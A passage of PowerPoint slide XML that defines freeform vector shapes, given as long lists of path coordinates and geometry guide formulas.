                      <a:pt x="346" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="557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64" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3689350" y="1428750"/>
                <a:ext cx="184150" cy="211138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 511"/>
                  <a:gd name="T1" fmla="*/ 384 h 585"/>
                  <a:gd name="T2" fmla="*/ 252 w 511"/>
                  <a:gd name="T3" fmla="*/ 426 h 585"/>
                  <a:gd name="T4" fmla="*/ 284 w 511"/>
                  <a:gd name="T5" fmla="*/ 457 h 585"/>
                  <a:gd name="T6" fmla="*/ 315 w 511"/>
                  <a:gd name="T7" fmla="*/ 473 h 585"/>
                  <a:gd name="T8" fmla="*/ 331 w 511"/>
                  <a:gd name="T9" fmla="*/ 473 h 585"/>
                  <a:gd name="T10" fmla="*/ 347 w 511"/>
                  <a:gd name="T11" fmla="*/ 463 h 585"/>
                  <a:gd name="T12" fmla="*/ 373 w 511"/>
                  <a:gd name="T13" fmla="*/ 441 h 585"/>
                  <a:gd name="T14" fmla="*/ 384 w 511"/>
                  <a:gd name="T15" fmla="*/ 415 h 585"/>
                  <a:gd name="T16" fmla="*/ 378 w 511"/>
                  <a:gd name="T17" fmla="*/ 378 h 585"/>
                  <a:gd name="T18" fmla="*/ 478 w 511"/>
                  <a:gd name="T19" fmla="*/ 273 h 585"/>
                  <a:gd name="T20" fmla="*/ 494 w 511"/>
                  <a:gd name="T21" fmla="*/ 316 h 585"/>
                  <a:gd name="T22" fmla="*/ 510 w 511"/>
                  <a:gd name="T23" fmla="*/ 394 h 585"/>
                  <a:gd name="T24" fmla="*/ 504 w 511"/>
                  <a:gd name="T25" fmla="*/ 426 h 585"/>
                  <a:gd name="T26" fmla="*/ 467 w 511"/>
                  <a:gd name="T27" fmla="*/ 494 h 585"/>
                  <a:gd name="T28" fmla="*/ 399 w 511"/>
                  <a:gd name="T29" fmla="*/ 547 h 585"/>
                  <a:gd name="T30" fmla="*/ 363 w 511"/>
                  <a:gd name="T31" fmla="*/ 562 h 585"/>
                  <a:gd name="T32" fmla="*/ 305 w 511"/>
                  <a:gd name="T33" fmla="*/ 584 h 585"/>
                  <a:gd name="T34" fmla="*/ 279 w 511"/>
                  <a:gd name="T35" fmla="*/ 584 h 585"/>
                  <a:gd name="T36" fmla="*/ 231 w 511"/>
                  <a:gd name="T37" fmla="*/ 573 h 585"/>
                  <a:gd name="T38" fmla="*/ 190 w 511"/>
                  <a:gd name="T39" fmla="*/ 557 h 585"/>
                  <a:gd name="T40" fmla="*/ 153 w 511"/>
                  <a:gd name="T41" fmla="*/ 525 h 585"/>
                  <a:gd name="T42" fmla="*/ 121 w 511"/>
                  <a:gd name="T43" fmla="*/ 484 h 585"/>
                  <a:gd name="T44" fmla="*/ 63 w 511"/>
                  <a:gd name="T45" fmla="*/ 394 h 585"/>
                  <a:gd name="T46" fmla="*/ 16 w 511"/>
                  <a:gd name="T47" fmla="*/ 294 h 585"/>
                  <a:gd name="T48" fmla="*/ 6 w 511"/>
                  <a:gd name="T49" fmla="*/ 247 h 585"/>
                  <a:gd name="T50" fmla="*/ 0 w 511"/>
                  <a:gd name="T51" fmla="*/ 200 h 585"/>
                  <a:gd name="T52" fmla="*/ 6 w 511"/>
                  <a:gd name="T53" fmla="*/ 153 h 585"/>
                  <a:gd name="T54" fmla="*/ 26 w 511"/>
                  <a:gd name="T55" fmla="*/ 111 h 585"/>
                  <a:gd name="T56" fmla="*/ 43 w 511"/>
                  <a:gd name="T57" fmla="*/ 90 h 585"/>
                  <a:gd name="T58" fmla="*/ 90 w 511"/>
                  <a:gd name="T59" fmla="*/ 53 h 585"/>
                  <a:gd name="T60" fmla="*/ 116 w 511"/>
                  <a:gd name="T61" fmla="*/ 32 h 585"/>
                  <a:gd name="T62" fmla="*/ 194 w 511"/>
                  <a:gd name="T63" fmla="*/ 0 h 585"/>
                  <a:gd name="T64" fmla="*/ 216 w 511"/>
                  <a:gd name="T65" fmla="*/ 0 h 585"/>
                  <a:gd name="T66" fmla="*/ 300 w 511"/>
                  <a:gd name="T67" fmla="*/ 22 h 585"/>
                  <a:gd name="T68" fmla="*/ 337 w 511"/>
                  <a:gd name="T69" fmla="*/ 48 h 585"/>
                  <a:gd name="T70" fmla="*/ 367 w 511"/>
                  <a:gd name="T71" fmla="*/ 84 h 585"/>
                  <a:gd name="T72" fmla="*/ 436 w 511"/>
                  <a:gd name="T73" fmla="*/ 179 h 585"/>
                  <a:gd name="T74" fmla="*/ 200 w 511"/>
                  <a:gd name="T75" fmla="*/ 347 h 585"/>
                  <a:gd name="T76" fmla="*/ 257 w 511"/>
                  <a:gd name="T77" fmla="*/ 153 h 585"/>
                  <a:gd name="T78" fmla="*/ 242 w 511"/>
                  <a:gd name="T79" fmla="*/ 137 h 585"/>
                  <a:gd name="T80" fmla="*/ 226 w 511"/>
                  <a:gd name="T81" fmla="*/ 121 h 585"/>
                  <a:gd name="T82" fmla="*/ 194 w 511"/>
                  <a:gd name="T83" fmla="*/ 111 h 585"/>
                  <a:gd name="T84" fmla="*/ 179 w 511"/>
                  <a:gd name="T85" fmla="*/ 111 h 585"/>
                  <a:gd name="T86" fmla="*/ 158 w 511"/>
                  <a:gd name="T87" fmla="*/ 121 h 585"/>
                  <a:gd name="T88" fmla="*/ 131 w 511"/>
                  <a:gd name="T89" fmla="*/ 147 h 585"/>
                  <a:gd name="T90" fmla="*/ 126 w 511"/>
                  <a:gd name="T91" fmla="*/ 163 h 585"/>
                  <a:gd name="T92" fmla="*/ 126 w 511"/>
                  <a:gd name="T93" fmla="*/ 179 h 585"/>
                  <a:gd name="T94" fmla="*/ 131 w 511"/>
                  <a:gd name="T95" fmla="*/ 216 h 585"/>
                  <a:gd name="T96" fmla="*/ 163 w 511"/>
                  <a:gd name="T97" fmla="*/ 273 h 585"/>
                  <a:gd name="T98" fmla="*/ 289 w 511"/>
                  <a:gd name="T99" fmla="*/ 200 h 5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11" h="585">
                    <a:moveTo>
                      <a:pt x="226" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="257" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="153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65" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3849688" y="1347788"/>
                <a:ext cx="177800" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 494"/>
                  <a:gd name="T1" fmla="*/ 157 h 589"/>
                  <a:gd name="T2" fmla="*/ 236 w 494"/>
                  <a:gd name="T3" fmla="*/ 126 h 589"/>
                  <a:gd name="T4" fmla="*/ 204 w 494"/>
                  <a:gd name="T5" fmla="*/ 110 h 589"/>
                  <a:gd name="T6" fmla="*/ 188 w 494"/>
                  <a:gd name="T7" fmla="*/ 110 h 589"/>
                  <a:gd name="T8" fmla="*/ 173 w 494"/>
                  <a:gd name="T9" fmla="*/ 115 h 589"/>
                  <a:gd name="T10" fmla="*/ 136 w 494"/>
                  <a:gd name="T11" fmla="*/ 147 h 589"/>
                  <a:gd name="T12" fmla="*/ 131 w 494"/>
                  <a:gd name="T13" fmla="*/ 168 h 589"/>
                  <a:gd name="T14" fmla="*/ 131 w 494"/>
                  <a:gd name="T15" fmla="*/ 189 h 589"/>
                  <a:gd name="T16" fmla="*/ 147 w 494"/>
                  <a:gd name="T17" fmla="*/ 247 h 589"/>
                  <a:gd name="T18" fmla="*/ 178 w 494"/>
                  <a:gd name="T19" fmla="*/ 325 h 589"/>
                  <a:gd name="T20" fmla="*/ 220 w 494"/>
                  <a:gd name="T21" fmla="*/ 404 h 589"/>
                  <a:gd name="T22" fmla="*/ 236 w 494"/>
                  <a:gd name="T23" fmla="*/ 430 h 589"/>
                  <a:gd name="T24" fmla="*/ 257 w 494"/>
                  <a:gd name="T25" fmla="*/ 456 h 589"/>
                  <a:gd name="T26" fmla="*/ 294 w 494"/>
                  <a:gd name="T27" fmla="*/ 478 h 589"/>
                  <a:gd name="T28" fmla="*/ 309 w 494"/>
                  <a:gd name="T29" fmla="*/ 478 h 589"/>
                  <a:gd name="T30" fmla="*/ 331 w 494"/>
                  <a:gd name="T31" fmla="*/ 467 h 589"/>
                  <a:gd name="T32" fmla="*/ 357 w 494"/>
                  <a:gd name="T33" fmla="*/ 446 h 589"/>
                  <a:gd name="T34" fmla="*/ 367 w 494"/>
                  <a:gd name="T35" fmla="*/ 420 h 589"/>
                  <a:gd name="T36" fmla="*/ 367 w 494"/>
                  <a:gd name="T37" fmla="*/ 398 h 589"/>
                  <a:gd name="T38" fmla="*/ 341 w 494"/>
                  <a:gd name="T39" fmla="*/ 320 h 589"/>
                  <a:gd name="T40" fmla="*/ 461 w 494"/>
                  <a:gd name="T41" fmla="*/ 262 h 589"/>
                  <a:gd name="T42" fmla="*/ 493 w 494"/>
                  <a:gd name="T43" fmla="*/ 357 h 589"/>
                  <a:gd name="T44" fmla="*/ 488 w 494"/>
                  <a:gd name="T45" fmla="*/ 435 h 589"/>
                  <a:gd name="T46" fmla="*/ 472 w 494"/>
                  <a:gd name="T47" fmla="*/ 472 h 589"/>
                  <a:gd name="T48" fmla="*/ 414 w 494"/>
                  <a:gd name="T49" fmla="*/ 530 h 589"/>
                  <a:gd name="T50" fmla="*/ 367 w 494"/>
                  <a:gd name="T51" fmla="*/ 556 h 589"/>
                  <a:gd name="T52" fmla="*/ 278 w 494"/>
                  <a:gd name="T53" fmla="*/ 588 h 589"/>
                  <a:gd name="T54" fmla="*/ 236 w 494"/>
                  <a:gd name="T55" fmla="*/ 582 h 589"/>
                  <a:gd name="T56" fmla="*/ 194 w 494"/>
                  <a:gd name="T57" fmla="*/ 572 h 589"/>
                  <a:gd name="T58" fmla="*/ 120 w 494"/>
                  <a:gd name="T59" fmla="*/ 509 h 589"/>
                  <a:gd name="T60" fmla="*/ 84 w 494"/>
                  <a:gd name="T61" fmla="*/ 451 h 589"/>
                  <a:gd name="T62" fmla="*/ 47 w 494"/>
                  <a:gd name="T63" fmla="*/ 383 h 589"/>
                  <a:gd name="T64" fmla="*/ 0 w 494"/>
                  <a:gd name="T65" fmla="*/ 247 h 589"/>
                  <a:gd name="T66" fmla="*/ 0 w 494"/>
                  <a:gd name="T67" fmla="*/ 194 h 589"/>
                  <a:gd name="T68" fmla="*/ 5 w 494"/>
                  <a:gd name="T69" fmla="*/ 147 h 589"/>
                  <a:gd name="T70" fmla="*/ 52 w 494"/>
                  <a:gd name="T71" fmla="*/ 73 h 589"/>
                  <a:gd name="T72" fmla="*/ 84 w 494"/>
                  <a:gd name="T73" fmla="*/ 47 h 589"/>
                  <a:gd name="T74" fmla="*/ 126 w 494"/>
                  <a:gd name="T75" fmla="*/ 21 h 589"/>
                  <a:gd name="T76" fmla="*/ 214 w 494"/>
                  <a:gd name="T77" fmla="*/ 0 h 589"/>
                  <a:gd name="T78" fmla="*/ 288 w 494"/>
                  <a:gd name="T79" fmla="*/ 10 h 589"/>
                  <a:gd name="T80" fmla="*/ 320 w 494"/>
                  <a:gd name="T81" fmla="*/ 31 h 589"/>
                  <a:gd name="T82" fmla="*/ 378 w 494"/>
                  <a:gd name="T83" fmla="*/ 89 h 589"/>
                  <a:gd name="T84" fmla="*/ 278 w 494"/>
                  <a:gd name="T85" fmla="*/ 189 h 589"/>
                  <a:gd name="T86" fmla="*/ 257 w 494"/>
